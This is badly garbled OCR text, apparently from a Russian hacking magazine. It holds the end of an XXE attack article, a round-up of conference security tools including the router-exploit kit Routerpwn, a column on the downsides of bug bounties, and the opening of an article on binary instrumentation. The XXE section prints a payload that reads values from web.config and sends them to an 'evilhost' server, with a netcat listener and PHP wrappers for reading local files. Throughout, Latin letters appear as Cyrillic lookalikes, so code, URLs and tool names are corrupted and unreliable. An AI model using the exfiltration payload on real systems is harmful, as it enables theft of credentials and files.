вести ту же операцию, что и с помощью сущностей-параме- 
тров. Получаем данные с удаленного сервера, производим 
конкатенацию с нашим доменом и обращаемся к полученно- 
му ІІРІІ. 

А теперь подробнее и на примере. Предположим, у нас 
есть документ следующего вида: 



<?хт1 ѵегБіоп= ,, 1.0" епсобіп§="иФФ-8 м ?> 
<сопбцигаФіол> 



<сопбе5есФіопБ> 

кзесФіоп пате="5АМ РІ.Е" Фуре="5у5І:ет._# = і 

Соп-й^и гаФіоп . МатеѴаІиеБесФіопНапсІІег , БузФет, 

Ѵегз іоп=1.0.0^0 л СиІФиге=пецФга 1, 

РиЬ1ісКеуТокеп=84а2Ь6са42ае-Р84а і Си5Фот=пи11" /> 
</сопб25есФіопБ> 



<5АМРФЕ> 

<абб кеу="СоппесФіоп5Фгіп§" ѵа1ие=_' сІаФа ^ 

Боигсе=192,168 ,97. 199; іпіФіаІ сафаіо ^*- 1 

5оте_саФа1оёіра5 5могсІ=" " ; регБІБФ БесигіФ ѵ 
іпФо=Ігие;и5ег іб=за;>гагк5ФаФіоп ісІ=5егѵ :<-> 
раскеФ 5І2е=409б' /> 

< асісі к еѵ='ТгасеМос1е" ѵа1ие="0" /> 

<асШ кеу^'ІІБегМате" ѵа1ие=’ , асIтіпі5Ф^^аФог , ' /> 




\ѴАКЫШС 

Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



боситепФ(сопсаФ( ' ИФФр_:.//еѵі11по5Ф/ 1 . ^ 

сІоситепФ( *Д1 е : / / /с : /і пе ФриЬ/і л гымгооФ/ме Ь.с опІі й 1 )/«-■ 

соп1іёига1:іоп/5АМРІЕ/асІб[0]/@ѵа1ие ) ) 

Мы получаем значение атрибута ѵаіие тега абб, где хранят- 
ся интересующие нас данные, и передаем эту информацию 
в циегу зТгіпд на контролируемый нами сервер. 

Однако если у нас есть возможность влиять на весь доку- 
мент в целом, то мы можем реализовать не только обращение 
на сторонний сервер, но и некоторую логику преобразования. 
Например, ргооі-оі-сопсері:, который ты найдешь на прилага- 
емом к журналу диске, позволяет выполнить следующие опе- 
рации: 

■ получить данные со стороннего сервера; 

■ закодировать все полученные данные в эквивалентные 
Мех-значения; 

■ передать данные по частям в пределах с помощью РЫЗ- 
запросов. 

ОСОБЕННОСТИ ПРОВЕДЕН ИЯ АТАКИ 
НА РАЗНЫЕ ПАРСЕРЫ 

Одна из особенностей — парсер не проверяет длину фор- 
мируемого 1131; кроме того, многие парсеры автоматически 
конвертируют переносы строк (Хегсез заменяет их на про- 
белы, а ЗузІет.ХМЬ просто пропускает через игіепсобе). 
Однако эта длина будет проверяться на стороне нашего 
веб-сервера (чаще всего это 2048 байт), поэтому вместо 
полноценного веб-сервера можно использовать команду 
«пс -і -р 80». 

Однако парсер ІібхтІ, который используется в РНР, РуіМоп, 
РиЬу, по умолчанию ограничивает размеры подгружаемых 
системных сущностей (2 Кб), для обхода этого необходимо 
запускать его с флагом [_ІВХМІ__РАРЗЕНІІОЕ. А еще этот пар- 
сер не конвертирует переносы строк, так что многострочные 
файлы с его помощью тоже не удастся отправить. 

К счастью, в РНР есть прекрасные врапперы, о которых 
подробно рассказывал Алексей Москвин на конференции 
РНОауз 2012 ( БІісІеБМаге.пеІ/рйсІаѵБ/рИр-цѵгаррегз ). С их по- 
мощью можно не только конвертировать многострочные фай- 
лы в одну строку (через враппер «рМр://1іІ1ег/геаб=сопѵегФ 
Ьазе64-епсосІе/ге5оигсе=МІе:///с:/Ьооипі»), но и использо- 
вать в основном ОТО, чтобы передать содержимое файла ехі. 
хті без внешнего обращения с помощью враппера «ба1а:1ех1/ 
М1тІ;ба5е64,РСРРТІРЦѴРкдбЗВ0М***».^ 



Обзор интересных инструментов с прошедших хакерских 

конференций 




Хакерские конференции — идеальное место, где можно пообщаться 
с единомышленниками и поделиться свежими идеями. На хакерских 
конференциях показывают О-сІау-сплоиты и рассказывают про новые 
векторы атаки. И на хакерских же конференциях представляется 
зашкаливающее количество новых хакерских утилит. Мы решили 
собрать их в одном месте, В этакой сборной солянке. 




Антон «Ап(» Жуков 

апі@геаІ.хакер,ги 
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обираем урожай 



8і 






МА8ТІРГ 

зоигсеТогае.пеІѴргоіесІз/ппазЩ'Г 

Открывать наш парад будет инструмент под названием МАЗТІРР. Это 
фреймворк для статического анализа малвари и обычных бинарных 
файлов. Процесс динамического анализа (исследование поведения 
экземпляра программы) уже хорошо автоматизирован в различных 
фреймворках. Инструментов же для статического анализа (или, дру- 
гими словами, изучения основных характеристик образца) пока очень 
мало. Проблема известная: при статическом анализе приходится вруч- 
ную запускать кучу скриптов, что сильно затягивает процесс по време- 
ни и снижает его эффективность. МАЗТІРР разработан, чтобы решить 
эти проблемы (насколько эффективно — еще вопрос, но задумка пра- 
вильная). Как говорят разработчики, он решает две основные задачи: 
сначала автоматически определяет тип анализируемого файла и затем 
применяет соответствующие ему техники анализа. Инструмент напи- 
сан на Руібоп и расширяем за счет написания собственных плагинов (в 
дистрибутив уже входят аддоны для анализа файлов МісгозоИ СЖісе, 
II Р, РЭР, ЕХЕ). 



$ таз.ру -И 

Іізаде : та$ . ру [ор1іоп$] РШЕ 
Орііопз: 

-С СОМРКЗ РИЕ, — СОПГ<ШРІб_ШЕ 

Узе ап аііегпаіе сопРід Іііе. Т*іе сіеіѳиіі І5 

-Н, --Неір 5Иоѵ І&е Иеір теьзаде апй ехіі, 

-і пие™ туре, —шершни туре 

ііъі а 11 аѵаіІаЫе рІид-іп$ оі зресіііесі іуре апгі 
ехіі. Туре пшзіі Ье опе оТ 'апаІу5і&' ог 'саі'. 

-0 ОѴЕКЯІПЕ, --орШп=0ѴЕ№І0Е 

Оѵеггійе а сопіід Ше оріюп, Сопіідигаіюп ор1юп5 
зЬоиІй Ье зресИіей аъ 'Зесііоп , .Кеу-Ѵаіие 1 апсі 5ЬоиІгі 
Ье яиоіегі іі апу мЫіезрасе І5 ргевещ. Миіііріе 
оѵеггісіез сап Ье зресіііесі Ьу и&іпд тиіііріе '-о' 
орііоп&. 

-р РШОГМ МАМЕ, -рІидіп^І_ибІН МАМЕ 

Опіу гип ІЬе аресіііей апаіу^із ріид-іп. Мате ти5і Ье 
дисіегі хР 11 еопіаіпз ыЫіезрасе, 

-д, -диіеі Опіу Іод еггогх. 

-I РТУРЕ, --Іуре=РТѴРЕ 

Рогсе Тііе Іо Ье апаІугеЬ міІН рІид-Ш5 ігот 1Ье 
зресіііегі саіедогу (е.д., ЕХЕ Г РОР, еіс.), Дип 
*-1 саі;* Іо І15І а II аѵаіІаЫе саіедогу ріид-іпз. 

-V, -ѵегЬоье Ргіпі ѵегЬо&е Іодъ. 

- ѵ Р --ѵегйіоп 5Ьом ргодгапГэ ѵегЫоп питЬе г апсі ехіі. 



МОЮСН 

ді№иЬ^сот/аоІ/тоІосЬ 

Следующая находка — высокомасштабируемая открытая система 
для захвата сетевых пакетов. Моіосіі способна парсить и индексиро- 
вать миллиарды сетевых сессий, предоставляя чрезвычайно быстрое 
и простое веб-приложение для навигации по обширным коллекциям 
РСАР-файлов, основанных на ІР/СеоІР/АЗІ\І/І"Ю5Іпате/инІ_итакдалее. 
Утилита может использоваться для захвата трафика в реальном време- 
ни, а также в качестве сетевой {огепзіс-тулзы при расследовании инци- 
дентов. Если есть большой репозиторий РСАР-дампов (перехваченный 
трафик малвари, трафик сканирования сети и распространения экс- 
плойтов), то Моіосіі — это идеальный помощник, чтобы не запутаться 
во всем этом хозяйстве. 
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РОЕ 



собе.а 



д|е. сот/р Дое-р.гоіес.і 



Те пользователи, кому «посчастливилось» жить в странах с цензурой 
на интернет, ограничены в доступе к некоторым веб-сайтам и новост- 
ным лентам, таким как СМЫ или ВВС. Конечно, все эти ограничения 
можно с легкостью обойти, воспользовавшись забугорным прокси- 
сервером или, как вариант, Тог-сетью (хотя это верно только до того 
момента, пока в стране не начнут использовать 0Р(, что уже произо- 
шло в Китае). Теперь к данным методам прибавился еще один — вос- 
пользоваться утилитой РОЕ. Название программы происходит от со- 
кращения ТеесІ оѵег етаіі — это означает, что она позволяет получать 
В53- новости через почтовый аккаунт, не требуя при этом никаких 
прокси-серверов. РОЕ работает поверх 5МТР-протокола, и все, что не- 
обходимо, чтобы она доставила тебе свежую порцию новостей, — ■ это 
почтовый аккаунт с поддержкой РОРЗ- и ЗМТР-протоколов. Такое вот 
маленькое и элегантное решение проблемы. 



8ЕССиВЦ8 

ууѵу ѵу.вессиЬив.с от 

Если спросить любого, кто хоть раз пользовался такими известными 
сканерами уязвимостей, как Иеззиз или ОрепѴАЗ, то одним из пер- 
вых названных неудобств будет слишком подробный результат ска- 
нирования. На анализ лога может уйти в три раза больше времени, 
чем на само сканирование. А теперь только представь, что нужно 
с помощью Ыеззиз каждый день проверять безопасность вверен- 
ной сети. Это будет сущий ад — придется ежедневно тратить уйму 
времени на разбор огромных логов. Учитывая, что за этот пери- 
од в самой сети могло ничего и не поменяться, это будет напрас- 
но потраченным временем. Чтобы избавиться от этих неудобств, 
был разработан инструмент ЗессиЬиз. Для проверки безопасности 
он использует названные сканеры, но в отличие от них не выдает 
огромных результатов. Вместо этого он сравнивает результаты по- 
следнего сканирования и предыдущего и отображает разницу в сво- 
ем веб-интерфейсе, позволяя сразу выявить, что изменилось в ис- 
следуемом объекте. 



І8ЫІРРСР8 

аіШиЬ.сот/ііиЬег1:3/і5піІ1 : -СаР8 

С развитием технологий мобильный телефон все больше превращает- 
ся из обычного устройства для переговоров в устройство, шпионящее 
за своим владельцем. Разработчики софта под смартфоны как будто 
специально стараются предоставить окружающим доступ к личной 
информации пользователя. С одной стороны, это нехорошо, с дру- 
гой — грех не воспользоваться этим. іЗпі^ ОРЗ пассивно сниффает 
ЗЗЮ ргоЬе, АВР и МЭЫЗ (Вофоиг) пакеты, посылаемые находящимися 
поблизости айфонами, айпадами и другими беспроводными устрой- 
ствами. 

Цель такой прослушки — собрать данные, на основании которых 
можно будет идентифицировать каждое устройство и определить его 
предыдущее географическое местоположение, основываясь исклю- 
чительно на информации о последней использованной ѴѴі-Рі-сети. 
Известно, что иногда в АПР-пакетах, отправляемых устройствами под 
управлением ЮЗ, содержатся МАС-адреса (или В38Ю) беспровод- 
ных точек, к которым они подключались. іЗпйТ ОРЗ перехватывает эти 
АВР-запросы и отправляет МАС-адреса в локационный сервис беспро- 
водных сетей Арріе (Арріе’з ѴѴІРІ Іосайоп зегѵісе), маскируясь при этом 
под ЮЗ-устройство, для того чтобы получить С РЗ- координаты для за- 
данного ВЗЗЮ. В случае если были перехвачены только ЗЗЮ ргоЬ’ы 
для конкретного устройства, то іЗпіТТ ОРЗ может запросить сетевые 
имена на ѵ/ідіе.пеі и визуализировать возможные месторасположе- 
ния. Таким образом, определив географическое положение нескольких 
ЗЗЮ- и МАС-адресов, возможно отследить, где успел побывать девайс 
и, соответственно, его хозяин. 
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САЙТОВ ОІІ5Т 

ЬіШ/12еІ250 

Процесс реверс-инжиниринга в чем-то похож на поиск иголки в стоге сена, когда среди дремучих 
зарослей ассемблерного кода надо найти всего лишь одно место, где что-то генерируется/про- 
веряется/устанавливается. И без того непростая задача осложняется еще тем, что очень часто 
исследуемая малварь «портит» заголовок своего исполняемого файла, а производители проши- 
вок вычищают все идентификаторы из встраиваемых данных. Остается единственный вариант 
получить о программе хоть какие-то дополнительные сведения — это открыть ее в бех- редакторе 
и байт за байтом просматривать содержимое в надежде наткнуться на что-то читабельное. Это, 
как ты сам понимаешь, отнимет уйму времени, а у кого-то и желание анализировать дальше. 

Сапіог сіизі — это революционный инструмент для интерактивной визуализации бинарных 
файлов. Скормив программе нужный бинарник, реверсер может за секунды прочесать вдоль и по- 
перек мегабайты произвольных данных, ища легко опознаваемые графические паттерны — вме- 
сто строк с знакомой последовательностью байтов. Чтобы представить принцип работы утилиты, 
можно взглянуть на скриншот, а еще лучше установить ее и попробовать в действии. 



ЫМЕ 

собе.доодіе.еот/рДіте-Іюгепзісз 

Прекрасный экземпляр в коллекцию инструментов исследователя без- 
опасности мобильных приложений. ЫМЕ — это загружаемый модуль 
ядра, позволяющий дампить содержимое энергозависимой памяти 
в І_іпих и основанных на Ыпих устройствах, таких, например, как АпбгоісІ. 
Утилита позволяет либо сохранять содержимое памяти в локальную 
файловую систему, либо передать его по сети. 

Уникальность данного инструмента заключается в том, что это 
первая программа, позволяющая выполнить полный дамп памяти 
АпбгоісІ -устройств. Во время снятия дампа УМЕ минимизирует вза- 
имодействие между пользовательскими процессами и процессами 
ядра, что позволяет делать снимки памяти, которые больше пригодны 
для анализа, чем дампы, сделанные с помощью других инструментов. 



ООТЫЁТА8І.РОІТ 

ѵѵѵ/ѵѵ. б ід И: а I Ь і о б у д иа гб . с о т/б оігі еіаз р! о іі . Іі 1: т I 

Порой возникает необходимость внедрить свой код/библиотеку 
в уже работающий процесс. С обычными приложениями, скомпи- 
лированными в машинный код, все просто: существует большое 
количество инструментов, способных это делать, плюс такой функ- 
ционал достаточно легко накодить самому. А вот с приложения- 
ми, написанными на С#, все иначе. Они компилируются в Соттоп 
Іпіегтебіаіе І_апдиаде, который уже во время выполнения преоб- 
разуется в машинный код. ЭоІМеІіаеІроіі — утилита, способная вне- 
дрять .ЫЕТ-сборки в уже скомпилированные и запущенные приложе- 
ния, позволяя на лету изменять их код и внешний вид. С учетом того, 
что программ, написанных на С#, становится все больше и больше, 
это реально можно быть полезно. 




• АІЬСоп { ) — крупнейшая еже- 

годная конференция Юго-Восточной Европы, 
проводится в Афинах. 

• ВІаск На! ( ) — цикл конфе- 

ренций, которые проводятся ежегодно в различ- 
ных городах мира. 

• ОЕР СОИ ( ѵѵѵущ.беТсоп.ога ) — крупнейший 
съезд хакеров в США, проходящий в течение лета 
в Лас-Вегасе. 

• Екорагіу {щѵм.екорагіу.огд ) — ежегодное со- 
брание хакеров в Буэнос-Айресе, одно из наибо- 
лее ярких событий на хаксцене Южной Америки. 

• Наск Іп Піе Вох (сопТегепсе.ЫіЬ.огд ) — еже- 
годная конференция, проходящая в Малайзии 
и Нидерландах. 

• НаскІМІу ( ) — крупнейшая 

конференция в Центральной и Восточной Европе, 
проводится в Будапеште. 

• Маісоп ( ) — первая в мире 

конференция, посвященная вопросам малвари, 
проходит в Индии. 

• ЗНтооСоп ( уѵѵѵѵѵ.аіі тоосоп.ога ) — берет свое 
начало в 2005 году. Обычно проводится в февра- 
ле. 

• биттегсоп (ѵуѵѵѵѵ.зиттегсоп.ога ) — одна 
из старейших хакерских конференций. 

• 2его Иідіііз (щѵѵѵѵ.гегопідЫв.ги ) — международ- 
ная конференция, посвященная практическим 
аспектам информационной безопасности. 

• РНОауе ( ) — масштабная кон- 

ференция, объединяющая под своей крышей 
«пиджаки» и «футболки». 
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РАКЕЫЕТ I 

\ ргасбсаітаіѵѵагеапаіѵзіз.сопп/іакепеі і 

І 4 

Г I 

I ( 

I Еще одна очень интересная и полезная тулза РакеЫеІ: обязательно пригодится при дина- I 

I мическом анализе малвари. Она симулирует полноценную работу сети (ЭМЗ-сервера, веб- I 

I сервера и так далее), что позволяет запускать зловред в безопасном окружении {на вирту- і 
I альной машине без выхода во внешний мир) и полноценно анализировать его поведение, | 
I выявлять сетевую активность. Говоря кратко, данный инструмент: \ 

[ • легок в установке (работает в ѴѴіпсІо\л/5 и не требует сторонних библиотек); | 

| ■ поддерживает основные протоколы, используемые малварью; ; 

! ■ позволяет симулировать всю сетевую активность на локальной машине, что избавляет от не- I 

I обходи мости разворачивать вторую виртуальную машину; | 

| • предоставляет возможность добавить новые протоколы, написав собственные расширения ! 

| на РуІНоп; | 

| * обладает гибкой конфигурацией. ! 

і і 

і і 

і і 

! РакеЫе! поддерживает ЭЫЗ, НТТР и ЗЗІ_. Использует ѴѴіпзоск І_ауегесі Зегѵісе Ргоѵісіег (І_ЗР) і 

і для перенаправления сетевых пакетов на локалхост и прослушивания трафика. | 

I 4 

і і 

\ 4 
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ВиЫОЕІЕРНАЫТ 

I ЫіпсІеІерІпап^зоигсе'Гогае.пеІ: ! 

I 4 

і і 

і і 

! Проводя пентест, всегда полезно знать точную версию установленной СМЗ’ки, так как это зна- : 
\ чительно сокращает время исследования, избавляя от необходимости вручную перебирать \ 
! сплоиты для каждой конкретной версии. Существует несколько инструментов, отлично справ- ! 

; ляющихся с этой задачей: ѴѴАРР, ѴѴбаІѴѴеЬ и ВІІпсІЕІерИап!. Чтобы определить версию, «слепой і 

! слоник» сравнивает хеш-суммы файлов, расположенных в заранее известных местах, с пред- | 

; варительно вычисленными хеш-суммами этих файлов для различных версий. Преимущества і 

! такой техники в том, что она быстра, не порождает кучу сетевого трафика и легко автоматизи- I 

I руема. ВІіпсІЕІерІіапІ написан на РуІІіоп и может использоваться как отдельный инструмент или ; 

I как библиотека, позволяющая добавлять возможность Ипдегргіпйпд’а в сторонние программы. | 

і і 

I- і 

I. і 
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СНОР5НОР 

діШиЬ.сот/МІТВЕСИР/сНорвІ'ю р 

При сборе разведывательной информации или во время проведения 
криминалистической экспертизы вопрос, что происходит в сети, воз- 
никает довольно часто. Злоумышленники все чаще используют троян- 
ские программы, предоставляющие удаленный доступ к зараженной 
машине, и возможность дать ответ на этот вопрос зависит от способ- 
ности определить, какой протокол они используют. Популярные сете- 
вые инструменты, такие как ѴѴігезбагк, легко визуализируют данные, 
передаваемые по известным протоколам, — но абсолютно беспо- 
мощны, когда встречается неизвестный. Что делать в такой ситуации? 
Писать свой дешифратор? Как раз для такого случая и предназначен 
СІіорзІіор — фреймворк для анализа и расшифровки протоколов. 
Его цель — сделать написание дешифратора настолько простым, на- 
сколько это возможно. Для этого он предоставляет стандартный АР! 
и богатый набор библиотек, с помощью которых можно написать свой 
дешифратор и вытащить из РСАР с дампом трафика нужные данные. 
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Коиіегршп также включает в себя возможности для обнаружения сетевых 
устройств, позволяющие определить вендора, прошивку и адрес подключенного 
девайса 
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поитЕЯРши 

ѵѵшѵѵ.гоиіегрѵѵп.сот 

Потрясающая штука! Ноиіегри/п — это мобильный фреймворк для эксплуатации уязвимостей в различных роутерах 
(а также свичах и беспроводных точках доступа). По сути, это подборка локальных и удаленных веб-сплоитов. Для того 
чтобы его можно было запускать на всех смартфонах, фреймворк полностью написан на иаѵаЗсгір! и НТМІ_. По этой при- 
чине он отлично работает как на АпбгоісІ, ІРбопе, ВІаскВеггу, так и на планшетах. Скажу больше: весь фреймворк — это 
одна НТМІ_-страница, которую можно сохранить для офлайнового использования. Открыв ее, можно увидеть список 
вендоров сетевого оборудования, выбрав одного из которых получаем список уязвимого железа и эксплойтов для него. 
Если в списке есть нужное устройство — можно сразу запустить сплоит. 

Эксплойты собраны самые разные: вызывающие отказ в обслуживании, сбрасывающие админский пароль, «выди- 
рающие» данные пользователя для установки РРР-соединения, генерирующие ключ к точке доступа на основе ее МАС- 
адреса и так далее. Список сплоитов постоянно пополняется, и, как утверждает автор, в него входят несколько приват- 
ных экземпляров, отсутствующих в открытом доступе. Воиіегрѵѵп также включает в себя возможности для обнаружения 
сетевых устройств, позволяющие определить вендора, прошивку и адрес подключенного девайса. Сочетающая скром- 
ный размер и обширный функционал, эта утилита просто должна быть в арсенале. 



ОѴѴАЗР ВѴѴАР 

уууууу.ощабрЬууа.ога 

Завершает наш небольшой обзор ОѴѴАЗР ВѴѴА (ОѴѴАЗР Вгокеп ѴѴеЬ 
Арріісаііопз Ргоіес!}. В общем, название инструмента говорит само 
за себя — это своеобразный «тренировочный лагерь» для обучения 
взлому. Только в фильмах серверы крупных компаний взламывают- 
ся за считанью минуты, а в реальной жизни приходится много чего 
изучить, прежде чем проэксплуатировать даже самую простую 30!_- 
инъекцию. Чтобы можно было оттачивать навыки безболезненно 
для себя и окружающих, создаются специальные инструменты, заве- 
домо содержащие простые уязвимости. С них лучше всего и начинать 
практиковать свои навыки в исследовании безопасности. ОѴѴАЗР ВѴѴАР 
представляет собой образ виртуальной машины в формате ѴМѵѵаге, 
включающий в себя приложения, содержащие известные уязвимости. 
Такой инструмент пригодится тем, кто хочет научиться ручной и авто- 
матизированной проверке безопасности веб-приложений, познако- 
миться с инструментами для анализа исходного кода и рассмотреть 
основные векторы атак на веб-приложения. Одним словом, хороший 
вариант, чтобы безнаказанно подтянуть свои навыки в тестах на про- 
никновение. 
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КОЛОНКА 

АЛЕКСЕЯ 

СИНЦОВА 




ДРУГАЯ СТОРОНА МЕДАЛИ 

Крупные вендоры и ИТ-компании все чаще прибегают к краудсор- 
сингу для поиска уязвимостей. В прошлый раз мы посмотрели, 
зачем и как это можно сделать, а в этот раз хотелось бы обратить 
внимание на недостатки такой системы. 



РЕСУРСЫ 

Забавно, что некоторые говорят: вот сделаем багбаунти, 
и не нужны нам пентестеры (внутренние или внешние — 
не важно в данном ключе) — сэкономим круто! Что ж, такое 
можно сказать, но примерно через месяц выяснится несколь- 
ко печальных вещей: 

• охотники за багами далеки от системного подхода; 

• большинство багхантеров тестируют довольно ограничен- 
ное количество атак; 

• большая часть отчетов содержит либо неполную информа- 
цию, либо ложную; 

• большинство багхантеров не старается искать ресурсы — 
основной упор будет делаться на самые популярные и из- 
вестные ресурсы (что легко гуглится). 

Только эти пункты уже достаточно говорят о таком проекте. 
В итоге мы имеем кучу отчетов по самым попсовым ресурсам 
о Х85 и пару ЗОЫ. Любые более-менее интересные, слож- 
ные или архитектурные вещи так и останутся ненайденными. 
Разумеется, бывают случаи, когда кто-то хочет блеснуть эру- 
дицией и мастерством, но это исключения из правил. Тем 
не менее даже такие «исключения» ограничены - временем 
и желанием, а в итоге максимум РНР-баги и ХХЕ в более спря- 
танных ресурсах разбавляют тонны отчетов (с дубликатами, 
естественно) о ХЗЗ и с1іск|аскіпд. И главная проблема — люди, 
которые будут эти отчеты разбирать. Ведь надо не просто по- 
смотреть отчет о ХЗЗ, надо убедиться, что это не дубликат, 
что в других параметрах или скриптах того же плана подобной 
проблемы нет. Потом убедиться, что атака вообще возможна, 
что это не зеК-ХЗЗ, заполнить тикет, сгенерить ответ, связать- 
ся с разработчиками, назначить время исправления и так да- 
лее, и тому подобное. Короче, это требует людских ресурсов, 
причем эти люди должны разбираться в предметной области. 
При этом, возможно, остаются проблемы, которые багхантеры 
пропускают. В итоге мы получаем что-то, что не покрывает весь 
код и все возможные проблемы, поэтому говорить, будто кра- 
удсорсинг позволяет избавиться от «оффенсив секурити», не- 



верно. Да, это круто, да, это позволяет найти много проблем, 
но этого еще недостаточно. По крайней мере на первом этапе 
развертывания такой программы. Ведь есть еще зависимость 
от времени: активность наиболее высока в первые месяцы 
(один, два) с начала программы. Потом выясняется, что боль- 
шинство халявных багов уже найдены, и тогда народ забивает 
до тех пор, пока не наткнется на новый ресурс, «который еще 
не смотрел». Но все это хаотично и несистемно. Итак, на са- 
мом деле такая программа может иметь место именно тогда, 
когда есть команда внутренних/внешних специалистов, кото- 
рые выпускают продукт/сервис, проведя все проверки «по- 
взрослому», и оставляют для постоянной «поддержки» и про- 
верки багов на откуп сообществу багхантеров. Это и очень 
мотивирует, и позволяет спать более крепко (ну да, как же... 
но мечтать-то не вредно?). Еще один минус: если в вашей 
сети есть ЮЗ, то количество алертов возрастет, и опять же эти 
алерты надо разгребать, а значит, снова — людские ресурсы. 
Таким образом, число инцидентов возрастет, следовательно, 
будет больше форензики и работы для гезропзе-іеат (если 
таковые вообще имеются, для русских компаний это все не так 
актуально, есть же только риск проверок по ПДн). Но если 
у вас мало ресурсов, которые пригодны для багбаунти -про- 
граммы, то можно вписываться ограниченным контингентом 
девелоперов и админов, без команды секурити, все очень 
зависит от размеров, масштабов и возможностей. Так что тут 
есть что планировать и обдумывать. 

МАТЕРИАЛ 

Итак, мы начали программу по багбаунти. Мы бодры, веселы, 
мы ждем... И вот самое первое, что бросается в глаза, — ка- 
чество материала, а именно отчетов. Каждый ресерчер видит 
проблему по-своему, и так же по-своему он видит то, как ее 
следует преподнести, поэтому заранее продумайте прави- 
ла приема репортов, формат и прочее. И даже в этом случае 
будьте готовы получать в аттач ментах зоопарк архивов всех ма- 
стей, РЭР-, ЭОС- и даже РПТ -документы. Но это еще полбеды. 
Самое печальное, что может вас ждать, — это формат подачи. 
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Например, текст, где говорится, что на таком-то сайте у вас нет 
заголовка Х-Ргате-Орііопз, а значит, возможен кликджакинп 
Это замечательно и мило, но если на сайте нет никаких форм 
ввода и контроля, то кого это волнует? Или, например, отчет, 
где все, что есть, — это сообщение о наличии Х35 и скриншот 
аІегІСХЗЗ'). Все такие отчеты приводят к одному — трате вре- 
мени, а ведь багбаунти задумывался наоборот — чтобы время 
экономить. Ресерчеру не так сложно написать дельный отчет, 
зато это очень сильно ускорит процесс его валидации, про- 
верки вектора и, как результат, обратный ответ. Кроме того, 
квалификация тех, кто этот отчет валидирует, как было сказа- 
но выше, тоже должна быть на достаточном уровне, иначе бу- 
дут забавные кейсы. Вот вам реальная история, не связанная 
с багбаунти, но пример того, что может быть, если секурити- 
инциденты будут разбирать на скорую руку. 

В одной небольшой компании было несколько сервисов, 
и один умный парень догадался запустить сканер. После чего 
сканер выдал, что найдена уязвимость: 

ІтЫ: р:// 5егѵ . 5И:е . сот/ ?еоТо=іі1е : / //е1:с/ра55жі 

Молодой хацкер в своем ВидТгац’е открыл браузер и ввел 
ІІНІ_. И, о чудо, действительно он увидел заветный файл 
/еіс/раззѵѵсі в экране браузера. Как человек ответственный, 
он написал в техподдержку компании и гордо сообщил о про- 
блеме. Специалист компании открыл браузер в своей юбунте, 
ввел 1Л=|[_ и тоже увидел заветный файл. Завал иди ровал тикет, 
присвоил статус «Супер-Критикал-Мы-Все-Умрем». Девело- 
перы через пару дней закрыли тикет и, как следствие, багу. 
Менеджер компании, увидев, что был такой случай, решил 
вознаградить хакера. Но никто не спросил разработчиков, 
в чем же была проблема. Ну и ладно. . . но на самом деле то был 
обыкновенный ореп-гесіігесі:, и что хакер, что специалист тех- 
поддержки, открыв этот ІЛ=!І_ в браузере под Ыпих, гордо ли- 
цезрели свой собственный локальный /еіс/раззѵѵсі. Вы же 
понимаете, что это провал? А теперь учтите, что если ваша 
багбаунти-программа предлагает реальные барыши и плюш- 



ки, то найдется процент багхантеров, которые будут тупо впа- 
ривать вам булшит, в надежде поиметь с вас профит на халяву. 
Поэтому те, кто будут разбирать кейсы, должны четко шарить 
в вопросе. 

ЭТИЧНЫЕ ХАКЕРЫ 

Ну и последнее, скорее, о наболевшем. Есть группа людей 
(багхантеров), которые относятся к этому всему как к работе, 
за которую им должны. И, открывая багбаунти программу, не- 
вольно понимаешь, что мир полон жадных людей. Например, 
у нас в оркестре всегда, еще до багбаунти, была неофициаль- 
ная программа поощрения, о которой люди не знали. То есть 
был кто-то, кто находил баги и слал их нам просто потому, 
что он клевый парень, и мы благодарили его за это, как могли, 
соответственно стараниям во имя мира, дружбы и любви. Вот 
такие отношения ценятся, но то, что порождают багбаунти - 
программы, по моему мнению, немного убивает понятие этич- 
ности в угоду рынка. При этом страдает и качество. Например, 
многие «исследователи», найдя тупо-Х53, получают благодар- 
ность на сайте, скажем, МісгозоТС. Они делают шумный пост 
у себя в блоге о том, как помогли МС спастись от угроз, до- 
бавляют ссылку в резюме и выдают себя за убер-специалиста. 
И ведь продадут себя кому-то, кто не будет вникать в детали. 
Это все, конечно, не наши проблемы, но на общий уровень 
шума это немного влияет, делая мир «грязнее». 

ВМЕСТО ВЫВОДА 

Любая программа или проект, который вы хотите развернуть, 
должны иметь четкие цели, при этом надо понимать все воз- 
можные преграды и проблемы. В конечном счете если цель 
оправдывает те средства, что будут вложены, значит, это стоит 
того. То же самое и с багбаунти — не стоит думать, что это вы- 
годный суперпроект, который бесплатно сделает вас безопас- 
ными, исключит пентесты как необходимость и вообще сведет 
всю секурити лишь к проверке отчетов и закрытию багов. Все 
гораздо сложнее и очень сильно зависит от размеров скоупа, 
кадровых возможностей и правил самой программы. НС 





Фреймворка для динамической бинарной инструментации 

Продолжаем разговор об инструментации кода и знакомимся с наиболее по- 
пулярными фреймворками для динамической бинарной инструментации — 
ѴаІдгіпсІ, ОупатоПІО, Оупіпзі и Ріп. 




Дмитрий «Оіді» 
Евдокимов, ОідііаІ Зесигііу 

@еѵгіокітоѵсІ5 



В ПРЕДЫДУЩЕЙ СТАТЬЕ 

Перед тобой вторая из трех статей об инструментации кода. В первой, опу- 
бликованной в прошлом номере, мы говорили о классификации методов 
инструментации, статическом и динамическом анализе приложений, преи- 
муществах и недостатках каждого из этих подходов {настоятельно рекомен- 
дую тебе ознакомиться с этим материалом, чтобы ликвидировать пробелы 
и возможные вопросы}. 

Сегодня же мы поговорим о наиболее продвинутых фрейм ворках 
для динамической бинарной инструментации: из чего они состоят, как рабо- 
тают, в каких ситуациях используются. 

ОВІ-ФРЕЙМВОРКИ 

На сегодняшний день программные библиотеки динамической бинарной 
инструментации используют два основных пути для представления и ин- 
струментирования кода: 

• сіізаззетЫе-апсІ-гезупФіезізе (0&Н). При таком подходе машинный код 
конвертируется в промежуточное представление, которое затем инстру- 
ментируется и преобразуется обратно в машинный код (такой подход 
использует фреймворк ѴаІдгіпсІ}; 

• сору-апсІ-аппо1:аІе (С&А). Здесь входящие инструкции в точности копи- 
руются, за исключением тех, что связаны с потоком управления, после 
чего каждая инструкция аннотируется {описывается ее поведение и ее 
операнды). Аннотирование может проводиться через структуры данных 
(как в ОупатоПІО) или через іпзігисбоп-диегуіпд АРІ (как в Ріл). После 



чего инструменты используют данные из полученной аннотации для вы- 
полнения своей инструментации. Добавленный код анализа чередуется 
с исходным кодом, без какого-либо влияния на него. 

На данный момент существуют движки динамической бинарной инстру- 
ментации как пользовательского уровня, так и уровня ядра (последние, 
правда, пока недоступны широкой публике). Среди библиотек для инстру- 
